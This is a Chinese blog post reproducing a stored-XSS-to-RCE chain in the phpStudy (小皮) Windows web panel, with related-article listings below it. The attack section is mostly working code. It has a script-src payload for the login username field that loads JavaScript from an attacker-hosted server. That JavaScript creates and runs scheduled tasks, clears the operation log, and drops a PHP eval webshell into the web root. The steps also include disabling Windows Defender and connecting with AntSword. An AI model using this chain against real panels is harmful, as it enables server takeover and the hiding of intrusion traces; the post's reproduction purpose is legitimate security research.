phpstudy_小皮Web面板_RCE漏洞

最新推荐文章于 2023-11-08 16:56:06 发布
最新推荐文章于 2023-11-08 16:56:06 发布
阅读量489 收藏
点赞数 2
文章标签: php 开发语言 安全 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43878255/article/details/128934082
版权

一、漏洞描述

最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。

二、漏洞复现

  1. 首先在官网下载最新的 小皮windows面板 安装程序

  1. 在win10虚拟机中进行安装

  1. 安装完成后会弹出访问地址,具体如下:

  1. 访问登录系统面板,页面如下:

  1. 首先在用户名处插入弹窗的xss代码验证是否存在漏洞

<script>alert(123)</script>

  1. 然后再使用管理员账号登录系统

发现已经触发了弹窗。这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。

  1. 该系统后台有个计划任务的功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。

具体步骤如下:

a. 在vps上部署需要插入的 poc.js 文件,内容显示如下(在服务器的www目录下写入验证txt文件)

functionpoc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    varid=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res){
      $.post('/service/app/tasks.php?type=set_task_status',{
        task_id:id,
        status:0
      },function(res1){
        $.post('/service/app/tasks.php?type=set_task_status',{
          task_id:id,
          status:0
        },function(res2){
          $.post("/service/app/log.php?type=clearlog",{
            type:"clearlog"
          },function(res3){},"json");
        },"json");
      },"json");
    },"json");
  },"json");
}
functionsave(){
  vardata=newObject();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="10";
  data.minute="15";
  data.shell="echo ryan >C:/xp/xp.cn/www/1.txt";
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();
​
// 这里的hour代表时,minute代表分

PS:这里需要清空日志,避免重复触发,不然很容易把真实环境搞崩

b. 然后在登陆的用户名处插入如下代码

<scriptsrc=http://192.168.81.162/poc.js></script>

c. 只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。

复现到此,程序崩了。

使用 小皮面板命令行 重启服务

d. 因为小皮面板这个运维系统类似于宝塔,所以其中会部署网站

e. 这里写入webshell的话可以向网站目录下写

C:\xp\xp.cn\www\wwwroot\admin\localhost_80\wwwroot

f. 将上面的poc改造如下

functionpoc(){
  $.get('/service/app/tasks.php?type=task_list',{},function(data){
    varid=data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task',{
      tid:id
    },function(res2){
        $.post('/service/app/log.php?type=clearlog',{
            
        },function(res3){},"json");
        
      
    },"json");
  },"json");
}
functionsave(){
  vardata=newObject();
  data.task_id="";
  data.title="test";
  data.exec_cycle="1";
  data.week="1";
  data.day="3";
  data.hour="14";
  data.minute="20";
  data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
  $.post('/service/app/tasks.php?type=save_shell',data,function(res){
    poc();
  },'json');
}
save();

g. 用户名输入一下payload,密码任意,登录两次(登录一次面板有时候会不显示)

<scriptsrc=http://192.168.81.162/poc2.js></script>

h. 当管理员进入了首页或者操作日志,即可执行计划任务写入webshell

Windows Defender 直接把webshell给删了

关闭Windows Defender,重新写入计划任务

i. 执行完成之后可以看到写入php文件成功了

j. 连接蚁剑

三、总结

登录框处存在一个xss,管理员登录成功之后会触发xss漏洞,在登录成功之后的后台功能点计划任务当中存在命令执行,但是需要登录成功才可以利用,所以直接去编写恶意JS文件去写入计划任务,再到管理员登录去触发xss,使其管理员登录成功之后触发xss里的恶意JS文件从而导致RCE。

四、参考链接

phpstudy 小皮web面板 RCE漏洞

小皮web面板 RCE漏洞

Ryan_瑞恩
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安复现系列:phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
weixin_54626591的博客
05-06 102
phpStudy 小皮 Windows/Linux 面板 XSS到RCE漏洞
PhpStudy后门漏洞实战复现
la-大白
10-28 4804
phpstudy后门漏洞
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1354
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
小皮面板rce漏洞
weixin_61785633的博客
03-31 425
Linux也有不少规则,我们如果就按这种写法就会出现报错,不过我们却可以用双引号闭合,它只会把双引号所包含的数据写进文件中。这种方式,不过这也没关系,因为我们知道其实$_POST[]里面也有不用引号闭合的方式,那就是输入数字,变成$_POST[123],ok这下就修改完成了,后面在改改文件所在位置就行了,别文件传进去了,却访问不到木马文件。这就是我们当时登录时,所留下的记录,本来可以通过这个日志,知道有谁尝试登录过我们的小皮面板,但我们输入的js代码,会被它解析并运行,这就导致了xss漏洞
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 311
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3569
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
PhpStudy客户端和小皮Windows web面板
08-15
**标题与描述解析** 标题提及了"PhpStudy客户端和小皮Windows web面板",这主要涉及到两..."小皮面板安装程序.exe"和"phpstudy_x64_8.1.1.3.exe"是这两款工具的安装文件,用户可以通过运行这些文件来安装并开始使用。
PHPstudy小皮面板使用教程及详细解释
07-08
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的... 本文章是对PHP study小皮面板功能以及用处的详细解释。
php5.6.9可用yaf扩展下载phpstudy小皮面板php_yaf.dll
12-26
php_yaf.dll放置于phpstudyPHP路径下。 D:\phpstudy_pro\Extensions\php\5.6.9nts\ext 如果没有就看一下php.ini里有没有yaf 如果没有在最下方加上extension=php_yaf.dll
phpStudy_install_phpStudy_install
09-20
通常,下载的文件名为"phpStudy_install.exe",这与提供的压缩文件名相符。 ### 3. 安装过程 双击下载的"phpStudy_install.exe",启动安装向导: 1. **语言选择**:安装程序一般默认为简体中文,你可以根据需要...
phpstudy_rce.py
10-11
phpstudy_rce
Phpstudy(小皮面板) nginx 解析漏洞
PANDA墨森的博客
09-02 2937
一、Phpstudy(小皮面板)简介: PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。 二、漏洞简介: 自从2019年Phpstudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在Phpstudy(小皮面板)已经改版了,这次爆出的漏洞是nginx的解析漏洞,也就是存在已久的/xx.php解析漏洞 漏洞原理: 1、由于用户.
php服务器管理面板,小皮面板phpStudy for Linux 服务器运维管理面板
weixin_28809647的博客
03-13 536
全网首家linux docker容器面板,快速部署和管理Linux服务器环境!安装与使用小皮面板简介针对Linux系统,phpStudy团队推出全网首家linux docker容器面板,只要一个命令,快速安装面板,在面板里可以自行选择软件版本,可以方便的进行安全配置,就算没有Linux基础也可以快速搭建和管理服务器环境!phpStudy Linux 面板特色所有软件免费:phpStudy是一个知名...
phpstudy漏洞
qq_17054659的博客
01-11 6133
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
新版phpstudy文件上传漏洞靶场:21关的upload-labs安装,及404错误解决
03-07 3765
使用新版phpstudy搭建上传漏洞
phpstudy_小皮面板XSS到RCE
RestoreJustice的博客
03-23 538
phpStudy小皮面板用户登录日志存在存储型XSS漏洞,利用存储型XSS攻击者可以通过JS调用面板中的计划任务执行系统命令。
DVWA靶场部署-Windows
2301_76512255的博客
02-21 273
DVWA靶场Windows环境部署教程,涉及到相关的网络攻击仅作用于学习了解。维护网络安全人人有责,切勿将任何技术用于学习之外,共同维护网络文明和谐。
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 749
环境:php 5.5.30 工具:phpstudy小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
2023热门服务器运维工具测评——面板
suriye的博客
11-08 2077
服务器运维是一项需要耗费大量精力的工作,想要做到事半功倍,就需要找到与运维工作高度契合工具。文章盘点了2023年5大热门服务器面板,为大家测评更好用更高效的工具!!!
PhPstudy小皮面板
最新发布
02-24
PHPStudy小皮面板是一款基于Windows平台的PHP开发环境集成工具,它提供了一键安装和管理PHP、MySQL、Apache等常用的Web开发环境。小皮面板的特点如下: 1. 一键安装:PHPStudy小皮面板提供了一键安装功能,可以快速搭建PHP开发环境,无需手动配置。 2. 简单易用:小皮面板的界面简洁友好,操作简单,适合初学者使用。 3. 多版本支持:小皮面板支持多个PHP版本的切换,可以根据项目需求选择不同的PHP版本。 4. 集成工具:小皮面板内置了常用的开发工具,如phpMyAdmin、Redis、Memcached等,方便开发者进行数据库管理和缓存操作。 5. 虚拟主机管理:小皮面板支持虚拟主机管理,可以方便地创建和管理多个网站。 6. 安全性:小皮面板提供了安全防护功能,可以对网站进行安全加固和防护。 7. 插件扩展:小皮面板支持插件扩展,可以根据需要安装和使用各种插件。 总之,PHPStudy小皮面板是一款方便易用的PHP开发环境集成工具,适合初学者和中级开发者使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值